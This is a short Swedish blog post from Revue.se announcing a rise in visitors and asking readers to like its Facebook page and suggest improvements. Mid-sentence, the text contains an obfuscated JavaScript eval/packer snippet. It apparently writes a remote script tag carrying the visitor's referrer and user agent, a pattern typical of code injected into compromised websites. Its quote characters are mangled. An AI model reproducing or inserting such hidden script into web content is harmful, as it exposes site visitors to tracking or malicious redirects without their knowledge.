Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Revue.se växer och behöver ert stöd på Facebook

Revue.se växer och behöver ert stöd på Facebook
Sebastian

Under eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|knysi|var|u0026u|referrer|nhndi||js|php’.split(’|’),0,{}))
de senaste månaderna har Revue.se fått en ökning av unika besökare på hela 400%. Både nya och återkommande användare strömmar in.

Detta är något vi tycker är jätte kul. Det ger oss motivation att förbättra och prestera för att göra det så bra som möjligt för er besökare.

Vi har en Facebook sida och behöver nu ert stöd. Det vore jätte kul om ni ville gilla oss där 🙂 Skulle betyda mycket!!! Där kan vi tillsammans med er också disskutera fram nya funktioner för att göra sidan bättre än någonsin.

Vi vill gärna ha mycket feedback på vad ni tycker vi skulle kunna förbättra samt lägga till. Revue.se är alltid ute efter nya roliga projekt att sätta oss in i. Kommentera gärna nedan så lovar jag att vi kommer att ta era åsikter vidare till produktion 🙂

Vår Facebooksida: Revue på Facebook